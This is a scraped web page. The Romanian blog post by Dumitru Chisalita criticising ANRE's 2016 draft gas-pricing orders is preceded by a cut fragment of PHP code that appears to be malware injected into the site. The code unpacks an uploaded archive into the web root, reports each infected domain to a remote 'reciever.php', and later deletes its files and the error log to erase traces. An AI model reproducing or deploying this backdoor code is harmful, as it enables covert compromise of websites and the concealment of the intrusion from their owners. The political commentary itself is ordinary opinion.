'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Cui face jocul ANRE ? | Dumitru Chisalita

Rss

Cui face jocul ANRE ?

imagesHalucinant ce se întâmplă pe piața gazelor. După ce în ultimele săptămâni declarații manipulatorii ale președintelui ANRE și a unor jucătorii au încercat să forțeze anumite decizii în piață, fără a reuși, ANRE a plasat în dezbatere un set de documente cu scop de creștere a importurilor de gaze.

Pe site-ul ANRE a apărut la începutul lunii iunie 2016 un Proiect de Ordin privind modificarea structurii amestecului de gaze naturale pentru clienții casnici. Un proiect ciudat, privind un subiect total neinteresant în plină vară, caracterizată de surplus de ofertă de gaze. Așa cum am gândit eu, au gândit probabil majoritatea celor care au văzut acest proiect de Ordin, găsindu-l probabil neinteresant pentru această perioadă din an.

La câteva zile apare un al Proiect de Ordin privind modificarea metodologiei pentru stabilirea venitului unitar aferent activității de furnizare reglementată desfășurată într-un an de reglementare și de aprobare a prețurilor reglementate în sectorul gazelor natural începând cu anul 2016.

Aparent un alt ordin neinteresant. Dar totuși mi-am pus întrebarea de ce au apărut acum?

Recitind primul proiect de Ordin privind modificarea structurii amestecului de gaze naturale pentru clienții casnici, am identificat un articol interesant strecurat în cadrul Ordinului: în cazul în care furnizorul achiziționează gaze naturale din import la un preț mai mic decât cel al gazelor naturale din producție internă acesta poate furniza clienților săi gaze naturale în structura de amestec cea mai avantajoasă economic pentru clienții casnici.

Mi am zis, un element absolut normal de a da furnizorului posibilitatea de a achiziționa gazele cele mai avantajoase pentru clienții săi. Interesant este că acest articol vine în opoziție cu construcția întregului Ordin, acela de a stabili obligația de a se consuma gaze din producția internă cu prioritate.

De ce s-ar strecura un articol de stimulare a importului de gaze într-un Ordin prin care se stabilește livrarea cu prioritate a gazelor către populație?

Răspunsul l-am găsit în următorul proiect de Ordin, prin care se arată că ANRE va recunoaște în costurile de achiziție realizate de către furnizorii care asigură gazele la populațíe, pentru gazele naturale din import curent, prețurile mai mici sau cel mult egale cu prețul de achiziție al gazelor naturale din producția internă extrase din înmagazinare subterană la care se adaugă tarifele aferente prestării serviciilor de înmagazinare subterană aprobate de ANRE.

Analizându-le împreună aceste două acte apreciez că ele în fapt : obligă la creșterea importurilor de gaze în România, (ordinele ANRE având caracter obligatoriu pentru piața de gaze naturale reglementată – dacă se îndeplinește condiția), și permit decontarea importurilor la prețuri mai mari decât au fost ele achiziționate. Toate acestea în raport cu menținerea nejustificată a uni preț mare a gazelor la populație.

În lipsa unor prețuri de referință pe piața românească, privind prețul gazelor din producția internă și a celui din import, practica încheierii în principal a contractelor bilaterale secretizate apreciez că se pot prezenta prețuri pentru gazele din import (aparent mai mici decât cele din producția internă) și ulterior la momentul decontării, să se solicite a fi recunoscute prețuri mai mari conform Ordinului ANRE.

România se laudă cu independența energetică pe piața de gaze naturale. Independență care nu este datorată nici unei instituții, fiind una conjuncturală, determinată în principal de închiderea industriei chimice. Acum, vedem diferite jocuri făcute pentru a redeveni dependenți de gazele din import. Este adevărat, conjunctura exporturilor de gaze către Europa, de acum câțiva ani s-a schimbat și piețe neinteresante atunci au devenit extrem de interesante astăzi.

Dependența energetică față de gazele de import, cantitățile de gaze mici care se vor găsi în depozite, va determina un adevărat test de stres, cu un impact important în iarnă asupra securității energetice a României, în condițiile în care ANRE :

  • Îndeamnă la achiziția de gaze din import, indicând că acestea sunt extrem de ieftine,
  • Sugerează că este mai avantajos să nu se înmagazineze gaze, deoarece la iarnă gazele din import vor fi mai ieftine,
  • Nu se asigură de respectarea obligației pe care o au furnizorii pentru a garanta asigurarea continuității în furnizarea gazelor – condiție obligatorie în licența eliberată de ANRE,
  • Emite Ordine care permite furnizorilor inginerii financiare de achiziționare a gazelor din import în detrimentul gazelor din intern, cu recunoașterea ulterioară a acestora în prețul gazelor la populație la prețuri mult mai mari.

                                                                                                                                  

Ultima tentație este cea mai mare trădare: să faci fapte bune din motive greșite. (T.S.Eliot)